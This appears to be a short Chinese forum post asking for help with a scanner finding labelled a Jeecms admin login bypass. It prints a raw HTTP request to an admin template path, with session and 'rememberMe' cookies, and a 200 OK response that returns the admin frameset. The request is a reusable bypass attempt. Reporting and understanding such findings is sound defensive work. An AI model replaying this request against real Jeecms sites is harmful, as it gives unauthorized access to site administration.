V6 网站漏洞:Jeecms后台登陆绕过。求高人指点!!!
url http://www.website.com.cn:80/
请求头
GET /jeeadmin/jeecms/template/template_main.do HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv:11.0) like Gecko
Host: www.websitecom.cn
Accept: */*
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=A777030585D479A21F6C71809E86224E; _site_id_cookie=1; clientlanguage=zh_CN;rememberMe=SKXuX9XZEnCmHfJM5Jt9dpTnviCqPZcqqOW8YJinevosanvWFMfVRLYh3eoj/Oayxq0J3PIGs7uPj0TE162R5WxAGDUGkwuyCdoa2Kn0y2uQQgnKe/jo2EPNqna9/0OQiSZiMwOyH16aFWfkEN9XCYeFXqwm9hqduN0W6JJffyN4Yw+ElYRxgfNRZQXwNHAfODG7ZrUckOHvn5njUk1CfCaJhpXbWkIHUc6fYea5lI0CG+jW+v2YvC0CEtFC842A3Q7hr5nVw/K/qRXCjjimeoD39fLQe4OTBusod91HgYhJTKskpGsyMrqe/sP0F49/evxjEt4K72bdyuQvhW0haLHdQ9bzgC4mvB+Qr6nYtXIf4IQ4jkcupQlid1s0WMMeh7xgPIdfKdn9e3/1T2tLUC7v0Xokb9p1hEFdibPTS7uvbyLFOZFR8luRzcAPkpnYokrTo7dN1+XmHjd3XY37eIw3ETYZyGX0e5FbVZ8kveqSapI7IvramUQJScCTXacaZMhMWMJkm6/iQg2KHyT1pdogUSB5AYXUABy0+WS0e+A=
Accept-Language: zh-cn
响应头
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DEA3365E6E64363D141AB890883C4CD8; Path=/; HttpOnly
Set-Cookie: JSESSIONID=DEA3365E6E64363D141AB890883C4CD8; Domain=website.com.cn
Set-Cookie: clientlanguage=zh_CN; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: zh-CN
Transfer-Encoding: chunked
Date: Mon, 06 Mar 2017 14:54:04 GMT
响应体
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>jeecms-main</title>
</head>
<frameset cols="210,*" frameborder="0" border="0" framespacing="0">
<frame src="../template/v_left.do" name="leftFrame" noresize="noresize" id="leftFrame" />
<frame src="../template/v_list.do" name="templateRightFrame" id="rightFrame" />
</frameset>
<noframes><body></body></noframes>
</html>
|
|
